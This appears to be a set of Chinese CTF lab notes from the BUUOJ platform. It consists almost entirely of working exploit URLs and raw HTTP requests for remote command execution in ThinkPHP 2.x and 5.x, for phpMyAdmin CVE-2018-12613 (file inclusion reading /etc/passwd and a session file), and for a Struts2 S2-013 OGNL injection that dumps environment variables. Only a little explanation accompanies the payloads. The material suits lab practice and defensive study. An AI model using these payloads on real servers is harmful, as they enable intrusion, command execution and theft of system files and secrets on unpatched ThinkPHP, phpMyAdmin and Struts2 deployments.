[ThinkPHP]5-Rce
v5.0.23及v5.1.31以下版本远程命令执行漏洞
http://node3.buuoj.cn:29858/index.php ?s=index/thinkapp/invokefunction &function=call_user_func_array &vars[0]=system &vars[1][]=whoami
获得flag
http://node3.buuoj.cn:26215/index.php?s=index/thinkapp/invokefunction &function=call_user_func_array &vars[0]=phpinfo &vars[1][]=-1
[ThinkPHP]5.0.23-Rce
POST /index.php?s=captcha HTTP/1.1 Host: node3.buuoj.cn:25184 Content-Length: 76 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Origin: http://node3.buuoj.cn:25184 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://node3.buuoj.cn:25184/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=ls Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close _method=__construct&filter[]=system&server[REQUEST_METHOD]=php -i&method=get
[ThinkPHP]2-Rce
http://node3.buuoj.cn:28705/index.php/Index/index/name/${@phpinfo()}
http://node3.buuoj.cn:28705/index.php/Index/index/name/${@system(pwd)}
ThinkPHP系列漏洞之ThinkPHP 2.x 任意代码执行
[PHPMYADMIN]CVE-2018-12613
http://node3.buuoj.cn:28623/index.php?target=sql.php%253F/../../../../../../etc/passwd
phpadmin执行 select “<?php phpinfo();?>”
GET /index.php?target=tbl_sql.php%253F/../../../../../../../../../../../../../../tmp/sess_672a9aa66b158e4b49d9c1892d0a30c8 HTTP/1.1
Host: node3.buuoj.cn:28623
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: pma_lang=zh_CN; phpMyAdmin=672a9aa66b158e4b49d9c1892d0a30c8; auto_saved_sql_sort=
Connection: close
[struts2]s2-013
http://node3.buuoj.cn:26757/link.action
?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D
env: 用于显示系统中已存在的环境变量,以及在定义的环境中执行指令。变量定义:定义在新的环境中变量,定义多个变量定义用空格隔开。格式为“变量名=值”;